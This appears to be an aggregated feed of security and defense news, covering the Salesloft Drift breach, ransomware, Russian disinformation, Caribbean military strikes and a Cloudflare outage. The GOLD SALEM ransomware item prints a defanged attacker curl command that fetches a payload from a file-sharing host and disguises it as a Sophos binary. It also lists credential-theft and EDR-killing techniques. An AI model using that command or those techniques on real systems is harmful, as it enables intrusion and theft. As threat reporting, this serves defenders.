• SolarWinds Corporation has released an official security advisory in response to a significant data breach involving Salesforce systems. This resulted in unauthorized access to sensitive customer information through compromised OAuth tokens linked to the Salesloft Drift integration. Understanding the Breach Impact Illustration of a data breach concept featuring a glowing red lock symbol and digital […]

    The post SolarWinds Issues Advisory Following Salesloft Drift Security Breach appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ten years ago, if you said artificial intelligence might surpass human-level intelligence by the year 2029, no one in Washington would have taken you seriously. A Wednesday hearing showed how dramatically that has changed.

    During the hearing, dubbed “Shaping Tomorrow: The Future of Artificial Intelligence,” the House Oversight Committee and its witnesses grappled with several trends: the rapid advance of AI, Beijing’s determination to dominate the field, and China’s increasingly threatening posture toward Taiwan.

    “Current trend lines suggest” that Ray Kurzweil—inventor, author, and current Google executive—”was dead on” when he predicted human-level AI by 2029, Samuel Hammond, chief economist at the Foundation for American Innovation, said at the hearing. 

    Kurzweil’s projection for the arrival of artificial general intelligence, or AGI, has been a staple of Silicon Valley cocktail parties for more than two decades, at least in the experience of this reporter, an impression shared by writers such as Max Chafkin and Jonathan Taplin

    The prediction is not universally endorsed by technologists; dissenters include Meta’s Yann LeCun and Google Brain founder Andrew Ng. But fans of AGI-by-2029 include Elon Musk and Google DeepMind creator Demis Hassabis—and increasingly, state-run Chinese media.

    Technologists have typically discussed it with a sort of gleeful fascination. But the hearing was anything but optimistic, especially when the subject focused on the AI race with China.

    If China’s government, which has already dedicated the country to ambitious AI goals, expects AGI within four years, the country’s increasing harassment of Taiwan takes on an even more menacing dimension.

    At the hearing, Hammond said a Chinese takeover of Taiwan would spark a “global depression,” because Beijing would choke off the flow of advanced computer chips from the island. That echoes warnings from former Biden Commerce Secretary Gina Raimondo, the conservative Heritage Foundation, and others. Chips made in Taiwan, particularly by world leader TSMC, are key to the world’s manufacturing and economic activity—and will only grow more so in an era dominated by advanced artificial intelligence.

    Hammond made the connection: “Over the last 40 years … we’ve shifted all our industries into services, entertainment, law, finance, all things that are about to be deflated by AI. So there’s a world where we build artificial general intelligence, but China is the one that puts it in factories and has the growth benefits.” 

    He suggested the U.S. redouble its efforts to improve its domestic chip manufacturing with a “CHIPS Act 2.0,” referring to the 2022 law that laid out $52 billion in incentives (including tax breaks) to encourage chip manufacturing in the United States.

    He also wants the U.S. government to work harder to keep advanced chips from China. Hammond pointed to the proposed GAIN Act, which would require chipmakers—those in the United States and those selling to the United States—to offer chips to U.S. companies before selling them to China. The language was dropped from the House version of the 2026 defense policy bill, but the Senate is considering adding it to theirs, which means its fate would turn on negotiations and the U.S. president. 

    Hammond called the act “the least we could do.”

    Unmentioned in the hearing were recent moves by the Trump administration to keep chips flowing to China. In July, the White House allowed chipmaker Nvidia to sell its advanced H20 chips, useful in AI work, to China. More recently, the administration has pushed to scuttle the GAIN Act. 

    Taken together, all of those indicators suggest a Chinese takeover of Taiwan would also yield China a near-permanent advantage in developing and deploying AI. A possible global depression is a price they might be willing to pay, if they emerge far stronger from it. 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday released details of two sets of malware that were discovered in an unnamed organization’s network following the exploitation of security flaws in Ivanti Endpoint Manager Mobile (EPMM). “Each set contains loaders for malicious listeners that enable cyber threat actors to run arbitrary code on the compromised server,”

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SolarWinds has released an advisory regarding a security incident involving the Salesloft Drift integration for Salesforce, which led to unauthorized data access.

    The company confirmed that its own systems were not impacted by the breach, but is treating the matter with high priority.

    The security incident originated from compromised OAuth tokens associated with the Salesloft Drift application, a popular tool used to integrate sales and marketing functions with Salesforce.

    Attackers exploited these compromised tokens to gain unauthorized access to multiple Salesforce customer environments. Once inside, they were able to export significant volumes of data.

    The primary goal of the threat actors appears to have been the acquisition of sensitive credentials, such as access keys and passwords, stored within the compromised Salesforce instances.

    This type of attack highlights the risks of third-party integrations, where a vulnerability in one application can create a pathway into a much larger ecosystem, affecting numerous organizations that rely on the same software stack.

    SolarWinds Confirms No Impact

    SolarWinds launched an immediate internal investigation to assess its own exposure to the vulnerability.

    The company’s security team determined that while SolarWinds does use Salesforce as part of its business operations, it does not utilize the Salesloft Drift integration.

    This key difference meant that SolarWinds’ Salesforce instance was not susceptible to the attack vector used in this breach. In a public statement, the company confirmed that its systems and data remain secure.

    Despite not being directly affected, SolarWinds emphasized that it is treating the incident as a high-priority concern and has proactively reviewed its internal security protocols to ensure the integrity of its environment. The company is also continuously monitoring the situation for any evolving threats.

    This event serves as a critical reminder of the supply chain risks inherent in modern cloud-based software environments. Many organizations rely on a web of interconnected third-party applications to enhance the functionality of core platforms like Salesforce.

    However, each integration adds a new layer to the organization’s attack surface. The compromise of OAuth tokens, in particular, is a potent threat, as these tokens can grant applications extensive permissions to access, modify, and exfiltrate data.

    The incident underscores the need for organizations to conduct rigorous security vetting of all third-party applications and to audit the permissions granted to these integrations regularly.

    Enforcing the principle of least privilege and implementing robust monitoring for unusual data access patterns are essential measures to mitigate such risks.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post SolarWinds Releases Advisory on Salesloft Drift Security Incident appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The cyberthreat landscape has witnessed the emergence of another sophisticated ransomware operation as GOLD SALEM, a new threat actor group also known as Warlock Group, has been actively compromising enterprise networks since March 2025.

    This emerging ransomware collective has successfully targeted 60 organizations across North America, Europe, and South America, demonstrating competent tradecraft while deploying their custom Warlock ransomware payload.

    Microsoft has tracked this group as Storm-2603 and suggests with moderate confidence that it operates from China, though attribution remains inconclusive.

    GOLD SALEM has positioned itself strategically within the competitive ransomware ecosystem by targeting a diverse range of victims, from small commercial entities to large multinational corporations.

    The group operates through a sophisticated double-extortion model, utilizing a Tor-based data leak site to publish stolen victim data when ransom demands go unpaid.

    Their victim selection appears strategic, largely avoiding targets in China and Russia, though they notably listed a Russian electricity generation services company in September 2025, suggesting potential operations from outside traditional ransomware safe havens.

    The threat actors made their public debut through underground forums in June 2025, posting on the RAMP forum to solicit exploits for enterprise applications including Veeam, ESXi, and SharePoint, while seeking tools to disable endpoint detection and response systems.

    Sophos analysts identified the group’s sophisticated operational security measures and noted their recruitment efforts for initial access brokers, indicating either direct intrusion capabilities or the development of a ransomware-as-a-service model.

    GOLD SALEM’s operational infrastructure demonstrates advanced planning and technical sophistication.

    The group maintains countdown timers for each victim, typically allowing 12-14 days for ransom payment before data publication.

    As of September 2025, they claim to have sold data from 45% of their victims to private buyers, though these figures may be inflated for psychological impact.

    GOLD SALEM leak site as of September 16, 2025 (Source – Sophos)

    The group’s data leak site features professional presentation and victim categorization, reflecting their commitment to operational professionalism.

    Advanced Evasion Techniques and Security Bypass Methods

    The technical analysis reveals GOLD SALEM’s sophisticated approach to security solution bypass and persistent network access.

    The group employs the ToolShell exploit chain targeting SharePoint servers for initial network compromise, leveraging a combination of critical vulnerabilities including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.

    Upon successful exploitation, they deploy an ASPX web shell that creates Process objects for cmd[.]exe within the IIS worker process context, enabling remote command execution with output visibility.

    A particularly notable technique observed involves their command execution through the web shell:

    curl - L - o c:\\users\\public\\Sophos\\Sophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txt

    This command downloads a Golang-based WebSockets server, establishing persistent access independent of the initial web shell.

    The group demonstrates advanced evasion capabilities through Bring Your Own Vulnerable Driver (BYOVD) techniques, utilizing a renamed vulnerable Baidu Antivirus driver (googleApiUtil64.sys) to exploit CVE-2024-51324 for arbitrary process termination, specifically targeting EDR agents.

    Their toolkit includes Mimikatz for credential extraction from LSASS memory, PsExec and Impacket for lateral movement, and Group Policy Object abuse for ransomware deployment across network endpoints.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Russian covert influence network CopyCop has significantly expanded its disinformation campaign, establishing over 200 new fictional media websites since March 2025.

    This expansion represents a marked escalation in Russian information warfare efforts, targeting democratic nations with sophisticated artificial intelligence-driven content generation and increasingly polished deception tactics.

    CopyCop, also designated as Storm-1516, operates as a cornerstone of Russia’s broader influence operations ecosystem.

    The network functions through a coordinated infrastructure of fake media outlets, fictional fact-checking organizations, and impersonation websites designed to undermine Western democratic institutions and erode international support for Ukraine.

    Combined with previously documented operations, the network now operates over 300 websites established throughout 2025, demonstrating unprecedented scale and reach in Russian influence operations.

    Recordedfuture analysts noted that these websites serve dual purposes within CopyCop’s operational framework.

    CopyCop website partiroyaliste[.]fr impersonating a French royalist political party (Source – Recordedfuture)

    First, they disseminate targeted influence content prepared by the Moscow-based Center for Geopolitical Expertise and network operator John Mark Dougan.

    Second, they publish large quantities of artificial intelligence-generated content featuring pro-Russian, anti-Ukrainian, and anti-Western narratives designed to poison the global information environment.

    The network’s infrastructure demonstrates sophisticated technical implementation and operational security measures.

    CopyCop operators register domains in coordinated batches across linked infrastructure, maintaining dormant websites that passively generate content until activated for targeted campaigns.

    This approach provides operational flexibility while building credibility through sustained content publication across multiple fictional media brands.

    The network’s geographic expansion includes new targeting of Canada, Armenia, and Moldova, while sustaining established operations against the United States and France.

    CopyCop has diversified its linguistic reach, publishing content in Turkish, Ukrainian, and Swahili languages never previously featured by the operation.

    These developments reflect strategic adaptation to maximize audience engagement and exploit regional political vulnerabilities.

    Self-Hosted Large Language Model Infrastructure

    CopyCop’s most significant technical evolution involves the deployment of self-hosted, uncensored large language models based on Meta’s Llama 3 architecture.

    This represents a deliberate shift away from commercial Western AI services, addressing operational security concerns while enabling unrestricted content generation aligned with Russian propaganda objectives.

    Technical analysis reveals CopyCop operators utilize either the dolphin-2.9-llama3-8b or Llama-3-8B-Lexi-Uncensored models, both popular uncensored variants available through open-source platforms like HuggingFace.

    Python script using Ollama shown by Dougan in a TV interview with French media (Source – Recordedfuture)

    Evidence supporting this assessment includes operational artifacts found within published articles, such as knowledge cutoff references to January 2023 and inconsistent JSON output formatting that suggests model performance degradation typical of “abliterated” or uncensored language models.

    The network’s technical infrastructure includes sophisticated deployment mechanisms revealed through John Mark Dougan’s inadvertent exposure during French media interviews.

    Video footage captured Python scripts utilizing the Ollama inference framework, specifically including functions named restart_ollama() that demonstrate operational deployment of local language model instances.

    This infrastructure operates from Russian-controlled servers, with GRU financial backing supporting the computational resources required for sustained content generation.

    # Example code structure observed in CopyCop operations
    def restart_ollama():
        # Restart local LLM inference service
        subprocess.call(['systemctl', 'restart', 'ollama'])
        return True

    The technical implementation creates significant operational advantages for CopyCop’s content generation capabilities.

    Self-hosted models eliminate external dependencies on Western AI service providers while enabling fine-tuning on Russian state media content provided by TASS and other Kremlin-aligned sources.

    However, this approach introduces performance constraints, as evidenced by frequent operational security failures including exposed LLM artifacts in published content and structured output formatting errors that betray automated generation.

    Recordedfuture researchers identified specific instances where CopyCop articles contained explicit model instructions, such as disclaimers stating “Please note that this rewrite aims to provide a clear and concise summary of the original text while maintaining key details” and metadata referencing “objective and factual” tone requirements.

    These artifacts demonstrate the network’s ongoing challenges in maintaining operational security while scaling content production through automated systems.

    The infrastructure expansion enables CopyCop to produce content at unprecedented scale while targeting multiple audiences simultaneously.

    The network maintains regionalized subdomain structures, such as the “Truefact” cluster featuring africa.truefact.news for Swahili content, turkey.truefact.news for Turkish audiences, and ukraine.truefact.news for Ukrainian-language disinformation.

    This approach maximizes content distribution while providing resilience against individual domain takedowns through mirrored hosting across multiple subdomains.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Russian Fake-News Network CopyCop Added 200+ New Websites to Targets US, Canada and France appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A recent special-operations exercise in the Caribbean showcased an Air Force operating concept designed to counter near-peer militaries—and, experts said, might be a message to unfriendly governments and criminal groups in the Americas.

    On Aug. 30, special operations airmen from the Kentucky National Guard stormed the Henry E. Rohlsen Airport on the island of St. Croix. Troops parachuted into the Caribbean Sea with an inflatable boat and more pararescuemen floated onto the airfield; together, they quickly took  over the grounds and established a U.S.-controlled base for cargo planes to land and deliver resources.

    “Within minutes, the Airmen had cleared the runways, established perimeter security and implemented air traffic control, allowing the C-130 to land and offload crucial assets,” Air Force Special Operations Command detailed in the release earlier this month. 

    The mock takeover—part of AFSOC’s larger, long-planned Emerald Warrior exercise— showcased the service’s Agile Combat Employment scheme of maneuver. Under ACE, airmen rapidly set up small operating bases in combat zones anywhere at a moment’s notice to evade long-range missile attacks. Service leaders and doctrine have described ACE as a necessary counter to anti-access and area-denial tactics developed by China, Russia, and others. Its rollout has seen hiccups; a Rand Corporation report earlier this year detailed “confusion” among airmen and units working to implement the concept. 

    Experts said that the timing and location of the exercise—held just days before the first airstrike on an alleged drug-running boat in the Caribbean—shows neighboring countries in the region how the U.S. military could be used in its campaign against so-called narco-terrorists.

    “Another intent, obviously, could be to signal to the region that we have these capabilities and we are ready to act in a serious way,” said Jennifer Kavanagh, a senior fellow and director of military analysis at the Defense Priorities think tank. “This is not just a deployment for show, these are not just threats of force. We are ready to use combat capabilities and combat strategies in the theater.”

    Air Force Special Operations Command officials made it clear that the demonstration was meant to send a message that the ACE concept was fast and adaptable, including in the Caribbean.

    “AFSOC stands ready to deliver decisive airpower anytime, anywhere, against any threat to national security,” said command spokesperson Rebecca Heyse.

    Another AFSOC exercise in the Caribbean saw special operations airmen travel 75 nautical miles “to conduct reconnaissance and targeting operations on a nearby island held by simulated enemy forces,” the command said.  

    Heyse said AFSOC “remains ready to execute the priorities of senior leaders without delay.”

    After those boots-on-the-ground exercises and the controversial airstrike on the Venezuelan boat earlier this month, the U.S. military began increasing its footprint in the area. MQ-9 Reaper drones and Marine Corps F-35Bs arrived in Puerto Rico after the Pentagon decried a "highly provocative move” by Venezuela after the country flew two of its F-16 fighter jets near U.S. Navy vessels. 

    Other supporting aircraft spotted in the area this week include C-5 and C-17 military transports and KC-46 and KC-135 tankers, an open-source tracking account reported. There have been at least two U.S. military attacks on alleged Venezuelan drug boats this month, killing a total of 14 people, according to White House statements.

    Kavanagh said that the military response in the region is overblown. 

    “Cartels are powerful. Military groups in Latin America have military capabilities, but are not military capabilities that can strike U.S. airbases in the region, so it seems like a little bit of overkill,” she said. “The force the United States has used so far in Latin America has been disproportionate to the threat.” 

    AFSOC’s Heyse said the command has no exercises planned in the Caribbean in the near future, but that they’re prepared to project more force in the region.

    “This does not rule out future potential exercises in the region as AFSOC relentlessly refines its capabilities and sharpens its edge to ensure unmatched lethality on future battlefields,” she said.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • When an incident happens, there’s no time to waste.  SOC teams must react fast to protect their organization, and this requires more than expertise. Strong solutions tailored to the needs of businesses can make all the difference. 

    The secret to radically cutting response time for incidents lies in equipping your SOC team with an enterprise-grade solution suited for teams that delivers fast, efficient results.

    In this article, we’ll break down how Interactive Sandbox by ANY.RUN helps teams worldwide significantly reduce MTTR and improve proactive detection. 

    What makes interactive malware analysis stand out 

    Analysis of a threat sample associated with notorious Lazarus APT in ANY.RUN Sandbox 

    ANY.RUN’s hands-on approach promotes a cutting-edge way to achieve improved metrics, including reduced MTTR, and well-informed protection of company infrastructure.

    The dual power of interactivity and real-time visibility into threats solves two major challenges SOC teams often face: 

    Challenge  ANY.RUN Solution  
    Slow reaction to threats: SOC teams waste time on routine manual tasks and unoptimized processes.  Interactive response: Analysts perform in-depth investigation in an easy-to-use interface with instant reports, reducing workload and accelerating triage.  
    Poor threat visibility: Automated solutions might speed up investigation but deliver only surface-level detection. Deep research in real time: Every action malware takes can be explored at an instant, enabling fast and well-informed moves. 

    That’s what takes interactive sandboxes like ANY.RUN a step beyond traditional automated malware analysis. Analysts see more than the final verdict; they can control the process and interact with malware. All this leads to a better understanding and more efficient conclusions. 

    Impact in numbers 

    With interactive malware analysis, SOC teams achieve impressive results, such as: 

    • 21 min reduction in MTTR per incident 
    • Up to 58% more threats identified overall 
    • Faster threat investigations in 95% of cases 

    Another factor that further accelerates incident response is smart automation. In ANY.RUN sandbox, most repetitive actions can be done automatically, including solving a CAPTCHA or opening a link.

    The sandbox performs actions necessary for detonation without increasing the workload of the analyst, allowing them to focus on more pressing tasks. 

    Cut response time and boost detection with ANY.RUN’s Interactive Sandbox for enterprises  -> Get a trial for your company 

    Breaking down a real-world threat in under a minute 

    Most attacks start with phishing. Malicious emails can be very deceptive and lead to company-wide security compromises. But it takes seconds to see the truth in ANY.RUN’s Interactive Sandbox. 

    In the analysis below, you can see a pdf file that seems harmless at first glance. But once opened, it reaches out to a phishing page hosted on SharePoint, a legitimate domain that once again might lead you to believe that it’s trustworthy.

    However, the sandbox flags it as malicious and attributes as phishing within seconds. 

    View analysis 

    Suspicious PDF file analyzed in ANY.RUN sandbox 

    By browsing through tabs and observing threat behavior, analysts get to react to the threat as quickly as possible: they can confirm and escalate the high-risk threat, block malicious domains or IPs related to it, and start remediation before attackers gain a foothold. 

    Without a sandbox, this kind of attack would be easy to miss. The file looks like a regular PDF, the hosting domain is trusted. But this threat could lead to stolen credentials using social engineering and invisible redirections.  

    Empower your SOC with a fast and simple sandbox to gain: 

    • Faster Threat Response: Attacks will be detected early on, reducing the window of exposure. 
    • Lower MTTR: Immediate insights into threat behavior will enable analysts to act with speed and confidence. 
    • Less Routine Workload: SOC team will be free to focus on high-value tasks and strategic action, while repetitive tasks will be done automatically. 

    Conclusion 

    By reducing investigation time and eliminating manual setup, ANY.RUN helps SOC teams operate more efficiently, while minimizing exposure to threats.

    Faster detection and deeper visibility give analysts the clarity and control needed to protect company’s environment before an incident escalates. 

    Reduce MTTR with instant analysis and in-depth threat visibility  -> Streamline SOC workflow with ANY.RUN  

    The post How to Radically Cut Response Time for Each Security Incident  appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Lawmakers on Thursday said the Trump administration’s strikes on alleged drug-trafficking boats in the Caribbean may have violated the War Powers Resolution and the Law of Armed Conflict.

    Democratic senators and one independent member aired their concerns during a Senate Armed Services Committee hearing to confirm the would-be head of the Pentagon’s counterterror policy office, a key organization in operations against drug cartels now designated international terrorist groups.

    Derrick Anderson, nominated to be the next assistant defense secretary for special operations/low-intensity conflict, demurred when asked whether he would question the legality of a strike on suspected traffickers in international waters, repeating that he had not been involved in previous decision-making. 

    “I understand that, but I'm talking in the future,” Sen. Angus King, I-Maine, told Anderson. “You may be in this job in three weeks and be ordered to strike another ship in the Caribbean. Are you going to ask a question about what is the legal authority for that strike?”

    Lawmakers have expressed alarm about aspects of the strikes’ execution, including a lack of congressional notification and subsequent briefings, but principally the absence of an Authorization for Use of Military Force, the legal framework that supports U.S. strikes on other terror groups, like al Qaida and ISIS.

    “This designation, however, does not grant new authorities for military targeting,” Sen. Jack Reed, D-R.I., the committee’s ranking member, said during the hearing. “Given the large number of U.S. military assets that have been deployed to the Caribbean, it is clear that the administration intends to continue such operations, but skirting law and denying transparency for the American people risk a dangerous escalation with international ramifications.”

    The president sent a War Powers Resolution report to Congress earlier this month as a justification for the Sept. 2 strike, but did not include the name of any designated organization. The administration’s defense rests on the president’s ability to order defensive strikes upon imminent threats, though legal experts have questioned whether a speedboat possibly carrying drugs to the U.S. meets that definition.

    Separately, there are now concerns about the possibility that servicemembers who were involved in the strikes could be prosecuted if their actions are determined to be war crimes.

    “We are hearing that there are individual folks in uniform involved in these operations who are now asking for legal cover in these operations because they believe that they potentially violate the law,” Sen. Elissa Slotkin, D-Mich., said during the hearing, alluding to reporting by the Wall Street Journal. 

    Slotkin continued, “This is a fundamental issue of this committee, and I would ask that you get smart on the legal authorities, because if individual folks in uniform are going to be held personally liable for your decisions, you should take accountability for that.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cloudflare has published a detailed post-mortem explaining the significant outage on September 12, 2025, that made its dashboard and APIs unavailable for over an hour.

    The company traced the incident to a software bug in its dashboard that, combined with a service update, created a cascade failure in a critical internal system.

    The incident began with the release of a new version of the Cloudflare Dashboard. According to the company’s report, this update contained a bug in its React code that caused it to make repeated, excessive calls to the internal Tenant Service API. This service is a core component responsible for handling API request authorization.

    The bug was located in a useEffect hook, which was mistakenly configured to trigger the API call on every state change, leading to a loop of requests during a single dashboard render. This behavior coincided with the deployment of an update to the Tenant Service API itself.

    The resulting “thundering herd” of requests from the buggy dashboard overwhelmed the newly deployed service, causing it to fail and recover improperly.

    Because the Tenant Service is required to authorize API requests, its failure led to a widespread outage of the Cloudflare Dashboard and many of its APIs, starting at 17:57 UTC.

    Incident Response and Recovery

    Cloudflare’s engineering teams first noticed the increased load on the Tenant Service and responded by trying to reduce the pressure and add resources.

    They implemented a temporary global rate-limiting rule and increased the number of Kubernetes pods available to the service to improve throughput. While these actions helped restore partial API availability, the dashboard remained down.

    A subsequent attempt to patch the service to fix erroring codepaths at 18:58 UTC proved counterproductive, causing a second brief impact on API availability. This change was quickly reverted, and full service was restored by 19:12 UTC.

    Importantly, Cloudflare noted that the outage was limited to its control plane, which handles configuration and management. The data plane, which processes customer traffic, was unaffected due to strict separation, meaning end-user services remained online.

    Following the incident, Cloudflare has outlined several measures to prevent a recurrence. The company plans to prioritize migrating the Tenant Service to Argo Rollouts, a deployment tool that automatically rolls back a release if it detects errors.

    To mitigate the “thundering herd” issue, the dashboard is being updated to include randomized delays in its API retry logic. The Tenant Service itself has been allocated substantially more resources, and its capacity monitoring will be improved to provide proactive alerts.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

      The post Cloudflare API Outage Linked to React useEffect Bug Causes Service Overload and Recovery Failure appeared first on Cyber Security News.

      ¶¶¶¶¶

      ¶¶¶¶¶

      ¶¶¶¶¶

      ¶¶¶¶¶

      ¶¶¶¶¶